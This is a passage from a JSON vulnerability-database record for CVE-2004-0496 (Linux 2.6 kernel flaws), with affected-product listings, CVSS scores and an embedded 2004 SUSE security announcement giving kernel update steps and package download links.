        "vendor": "\u30b5\u30f3 \u30de\u30a4\u30af\u30ed\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": "sun  9.0"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u30b5\u30f3 \u30de\u30a4\u30af\u30ed\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": "5.8"
      },
      {
        "model": "email server",
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "linux database server",
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "mandrake linux corporate server",
        "scope": null,
        "trust": 0.8,
        "vendor": "mandrakesoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "mandrake linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "mandrakesoft",
        "version": null
      },
      {
        "model": "linux connectivity server",
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "mandrake multi network firewall",
        "scope": null,
        "trust": 0.8,
        "vendor": "mandrakesoft",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u30b5\u30f3 \u30de\u30a4\u30af\u30ed\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": "5.9"
      },
      {
        "model": "linux office server",
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "sun solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u30b5\u30f3 \u30de\u30a4\u30af\u30ed\u30b7\u30b9\u30c6\u30e0\u30ba",
        "version": "9.0"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10779"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_connectivity_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_database_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_firewall:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:sun:sunos:5.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:7:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SuSE Security Advisory",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0496",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2004-0496",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-8926",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0496",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200412-022",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8926",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple unknown vulnerabilities in Linux kernel 2.6 allow local users to gain privileges or access kernel memory, a different set of vulnerabilities than those identified in CVE-2004-0495, as found by the Sparse source code checking tool. mandrakesoft of mandrake multi network firewall Unspecified vulnerabilities exist in products from multiple vendors.None. \nThese vulnerabilities were referenced in a SuSe advisory, however, further details are not currently available.  This BID will be updated or retired as more information becomes available. \nIt is reported that these issues present themselves in Linux kernel 2.6. The leak did not provide specifics. -----BEGIN PGP SIGNED MESSAGE-----\n\n______________________________________________________________________________\n\n                        SUSE Security Announcement\n\n        Package:                kernel\n        Announcement-ID:        SUSE-SA:2004:020\n        Date:                   Tuesday, Jul 2nd 2004 18:00 MEST\n        Affected products:      8.0, 8.1, 8.2, 9.0, 9.1\n                                SUSE Linux Database Server,\n                                SUSE eMail Server III, 3.1\n                                SUSE Linux Enterprise Server 7, 8\n                                SUSE Linux Firewall on CD/Admin host\n                                SUSE Linux Connectivity Server\n                                SUSE Linux Office Server\n        Vulnerability Type:     local privilege escalation\n        Severity (1-10):        6\n        SUSE default package:   yes\n        Cross References:\tCAN-2004-0495\n\t\t\t\tCAN-2004-0496\n\t\t\t\tCAN-2004-0497\n\t\t\t\tCAN-2004-0535\n\t\t\t\tCAN-2004-0626\n\n\n    Content of this advisory:\n        1) security vulnerability resolved:\n\t\t- chown: users can change the group affiliation of arbitrary\n\t\t  files to the group they belong to\n\t\t- missing DAC check in chown(2): local privilege escalation\n\t        - overflow with signals: local denial-of-service\n        \t- pss, mpu401 sound driver: read/write to complete memory\n\t        - airo driver: read/write to complete memory\n        \t- ALSA: copy_from_user/copy_to_user confused\n        \t- acpi_asus: read from random memory\n        \t- decnet: write to memory without checking\n        \t- e1000 driver: read complete memory\n           problem description, discussion, solution and upgrade information\n        2) pending vulnerabilities, solutions, workarounds:\n\t\t- icecast\n                - sitecopy\n                - cadaver\n                - OpenOffice_org\n                - tripwire\n                - postgresql*\n                - mod_proxy\n\t\t- freeswan\n\t\t- ipsec-tools\n\t\t- less\n\t\t- libpng\n\t\t- pavuk\n\t\t- XFree86*\n\t\t- kdebase3\n        3) standard appendix (further information)\n\n______________________________________________________________________________\n\n1)  problem description, brief discussion, solution, upgrade information\n\n    Multiple security vulnerabilities are being addressed with this security\n    update of the Linux kernel. \n\n    Kernel memory access vulnerabilities are fixed in the e1000, decnet, \n    acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. \n\n    Missing Discretionary Access Control (DAC) checks in the chown(2) system\n    call allow an attacker with a local account to change the group\n    ownership of arbitrary files, which leads to root privileges on affected\n    systems. An interesting variant of the missing \n    checks is that the ownership of files in the /proc filesystem can be \n    altered, while the changed ownership still does not allow the files to \n    be accessed as a non-root user for to be able to exploit the \n    vulnerability. Systems that are based on a version 2.4 kernel are not \n    vulnerable to the /proc weakness, and exploitation of the weakness \n    requires the use of the kernel NFS server (knfsd). If the knfsd NFS \n    server is not activated (it is off by default), the vulnerability is \n    not exposed. \n\n    The only network-related vulnerability fixed with the kernel updates\n    that are subject to this announcement affect the SUSE Linux 9.1 \n    distribution only, as it is based on a 2.6 kernel. Found and reported \n    to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability \n    allows a remote attacker to send a specially crafted TCP packet to a \n    vulnerable system, causing that system to stall if it makes use of \n    TCP option matching netfilter rules. \n\n    In some rare configurations of the SUSE Linux 9.1 distribution, some \n    users have experienced stalling systems during system startup. \n\n\n\n    SPECIAL INSTALL INSTRUCTIONS:\n    ==============================\n    For the impatient: Run YOU (Yast2 Online Update, command \n    \"yast2 online_update\" as root) to install the updates (semi) \n    automatically, if you have a SUSE Linux 8.1 and newer system. \n\n    For those who wish to install their kernel updates manually and for \n    those who use a SUSE Linux 8.0 system:\n\n    The following paragraphs will guide you through the installation\n    process in a step-by-step fashion. The character sequence \"****\"\n    marks the beginning of a new paragraph. In some cases, the steps\n    outlined in a particular paragraph may or may not be applicable\n    to your situation. \n    Therefore, please make sure to read through all of the steps below\n    before attempting any of these procedures. \n    All of the commands that need to be executed are required to be\n    run as the superuser (root). Each step relies on the steps before\n    it to complete successfully. \n\n\n  **** Step 1: Determine the needed kernel type\n\n    Please use the following command to find the kernel type that is\n    installed on your system:\n\n      rpm -qf /boot/vmlinuz\n\n    Following are the possible kernel types (disregard the version and\n    build number following the name separated by the \"-\" character)\n\n      k_deflt   # default kernel, good for most systems. \n      k_i386    # kernel for older processors and chipsets\n      k_athlon  # kernel made specifically for AMD Athlon(tm) family processors\n      k_psmp    # kernel for Pentium-I dual processor systems\n      k_smp     # kernel for SMP systems (Pentium-II and above)\n      k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM\n      kernel-64k-pagesize\n      kernel-bigsmp\n      kernel-default\n      kernel-smp\n\n  **** Step 2: Download the package for your system\n\n    Please download the kernel RPM package for your distribution with the\n    name as indicated by Step 1. The list of all kernel rpm packages is\n    appended below. Note: The kernel-source package does not\n    contain a binary kernel in bootable form. Instead, it contains the\n    sources that the binary kernel rpm packages are created from. It can be\n    used by administrators who have decided to build their own kernel. \n    Since the kernel-source.rpm is an installable (compiled) package that\n    contains sources for the linux kernel, it is not the source RPM for\n    the kernel RPM binary packages. \n\n    The kernel RPM binary packages for the distributions can be found at the\n    locations below ftp://ftp.suse.com/pub/suse/i386/update/. \n\n      8.0/images/\n      8.1/rpm/i586\n      8.2/rpm/i586\n      9.0/rpm/i586\n      9.1/rpm/i586\n\n    After downloading the kernel RPM package for your system, you should\n    verify the authenticity of the kernel rpm package using the methods as\n    listed in section 3) of each SUSE Security Announcement. \n\n\n  **** Step 3: Installing your kernel rpm package\n\n    Install the rpm package that you have downloaded in Steps 3 or 4 with\n    the command\n        rpm -Uhv --nodeps --force \u003cK_FILE.RPM\u003e\n    where \u003cK_FILE.RPM\u003e is the name of the rpm package that you downloaded. \n\n    Warning: After performing this step, your system will likely not be\n             able to boot if the following steps have not been fully\n             followed. \n\n\n    If you run SUSE LINUX 8.1 and haven\u0027t applied the kernel update\n    (SUSE-SA:2003:034), AND you are using the freeswan package, you also\n    need to update the freeswan rpm as a dependency as offered\n    by YOU (YaST Online Update). The package can be downloaded from\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/\n\n  **** Step 4: configuring and creating the initrd\n\n    The initrd is a ramdisk that is loaded into the memory of your\n    system together with the kernel boot image by the bootloader. The\n    kernel uses the content of this ramdisk to execute commands that must\n    be run before the kernel can mount its actual root filesystem. It is\n    usually used to initialize SCSI drivers or NIC drivers for diskless\n    operation. \n\n    The variable INITRD_MODULES in /etc/sysconfig/kernel determines\n    which kernel modules will be loaded in the initrd before the kernel\n    has mounted its actual root filesystem. The variable should contain\n    your SCSI adapter (if any) or filesystem driver modules. \n\n    With the installation of the new kernel, the initrd has to be\n    re-packed with the update kernel modules. Please run the command\n\n      mk_initrd\n\n    as root to create a new init ramdisk (initrd) for your system. \n    On SuSE Linux 8.1 and later, this is done automatically when the\n    RPM is installed. \n\n\n  **** Step 5: bootloader\n\n    If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there\n    are two options:\n    Depending on your software configuration, you have either the lilo\n    bootloader or the grub bootloader installed and initialized on your\n    system. \n    The grub bootloader does not require any further actions to be\n    performed after the new kernel images have been moved in place by the\n    rpm Update command. \n    If you have a lilo bootloader installed and initialized, then the lilo\n    program must be run as root. Use the command\n\n      grep LOADER_TYPE /etc/sysconfig/bootloader\n\n    to find out which boot loader is configured. If it is lilo, then you\n    must run the lilo command as root. If grub is listed, then your system\n    does not require any bootloader initialization. \n\n    Warning: An improperly installed bootloader may render your system\n             unbootable. \n\n  **** Step 6: reboot\n\n    If all of the steps above have been successfully completed on your\n    system, then the new kernel including the kernel modules and the\n    initrd should be ready to boot. The system needs to be rebooted for\n    the changes to become active. Please make sure that all steps have\n    completed, then reboot using the command\n        shutdown -r now\n    or\n        init 6\n\n    Your system should now shut down and reboot with the new kernel. \n\n\n    There is no workaround known. \n\n\n    Please download the update package for your distribution and verify its\n    integrity by the methods listed in section 3) of this announcement. \n    Then, install the package using the command \"rpm -Fhv file.rpm\" to apply\n    the update. \n    Our maintenance customers are being notified individually. The packages\n    are being offered to install from the maintenance web. \n\n\n\n\n\n    x86 Platform:\n\n    SUSE Linux 9.1:\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm\n      800418d3dddf6d3b83925f562842205a\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm\n      0cb990b159e10685bb29b76d312ddd25\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\n      7446bb70f52bce57a914066be4ed8e45\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\n      7446bb70f52bce57a914066be4ed8e45\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm\n      ede031495ee19d8b6eca1873e7155332\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\n      620ef40226fec31a773397cf3051bf36\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\n      9b61b5a70b304f5554cb18a6bae5b5fd\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm\n      227c85280ee17a66c8590fe1bb14c596\n    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\n      895fee3033de0810ff1173ce8ee87936\n\n    SUSE Linux 9.0:\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm\n      48be395b96329909486ae3a5152348fa\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm\n      4cd322b4f511d5fe4c483ed28a82097e\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm\n      262e33cebf1b0d35fb6d3235c9ab8815\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm\n      8d81370f90736b12aa71b9c744f6e0e2\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm\n      bc59c838c84ba318dc4d24da08a3022e\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm\n      f9586ba982e0398c3e48871955b661aa\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\n      18673b0bf347fe9557d4e67ca02000c0\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm\n      71496daac44196b0e0a3836ee6a3b4ed\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\n      7c208e9e3f7be1a68c3c8457eb2cafc4\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm\n      b77863c863aaf4b931bff263220e6ec9\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm\n      bed7e964e22c5e5d2f5e7a5e3816dde4\n    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\n      6b5137bf379fbfc861441151039575da\n\n    SUSE Linux 8.2:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm\n      50d261b44616f9145a0dc16df501a504\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm\n      10095854c0bdae20991d90b822352e14\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm\n      a2ef7cfb0e62ad955dda2b0574eb3150\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm\n      1d2b0d0e2c7998685ed04c24e593b196\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm\n      d8bf98c46ba5313db286d5706f7fb3b8\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm\n      e13a7b4c2b185cfeb991c31607f79ccb\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm\n      0e2f2cf20e7d7a20f3e50b245105df61\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm\n      6cfac2914d3827ec562ff9d6be29c566\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm\n      afd29843aa69d805ef5f25d39ecd0e7f\n    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm\n      098a1400a48404931acb8b3eb2e821fb\n\n    SUSE Linux 8.1:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm\n      3bdaa593d09a7cbff632a2c4446d5603\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm\n      ba60d0b2b6d3bc9c38b4e8b3859e1586\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm\n      ffa8983669004826a0cbedbe34dced76\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm\n      25174fd007f5a39ee0342dd6f18f2eaa\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm\n      10837fa561cd5104e55d48e46c837764\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm\n      c37e8b87819602e77b14206affef00fa\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm\n      7be68a677db5a65be1a46ec194b35497\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm\n      8e4b7d5a6bb81da5a00971cdcc4ec641\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm\n      d8ba1db81a9b517f867c970e4fc443a7\n    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm\n      96a0a9242d066083c7bff8e0f70b7bbe\n\n    SUSE Linux 8.0:\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm\n      ec1e53b3812c0c0bd3681435d69fb134\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm\n      583164e52019ae090fd47e425c2a933e\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm\n      9ac8983abef05697d75f3117e37e5f18\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm\n      4932c4d6a42fc9be02013f398ab5bb96\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm\n      b9de0731f9bbc4b016455a6d52cd8296\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm\n      a73bacad80432c26e856c41338b154bd\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm\n      782902cd14e7776db66bd61a12beee03\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm\n      d71fa5cda488ae18f8d023cd8f28bb73\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm\n      a360a9e6ed2db54f69e17db36f02614f\n    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm\n      8017fd6ff8a6fc1a0660ab35ad174388\n\n\n\n    x86-64 Platform:\n\n    SUSE Linux 9.1:\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm\n      e2c53fd24991f739fd754c07f7aa8293\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm\n      f4a69622b7628cdd662a4e39aa59b60e\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm\n      e71adfb1fc662600eb11d3acf67c3dc3\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\n      f6a364879d1f2ae2cf854810d61be3ac\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\n      a0096d1fc067d89c9200ea3904713d59\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\n      bf6d0439cfc37b50b4f6822c3403a74f\n\n    SUSE Linux 9.0:\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm\n      17e008a737e5e95e71335e34fa7f86cf\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm\n      ca742b550b1a503595b02cbfc9e0e481\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm\n      8e0c16c42d1a89aa6a09be1dd575de47\n    source rpm(s):\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\n      58b1bf42b5661119d06a04888144707a\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\n      5103001136e39fca5a59f4cbde82822b\n    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\n      231c9e5e00f17df8cfd72d6c8a68d9cf\n\n\n______________________________________________________________________________\n\n2)  Pending 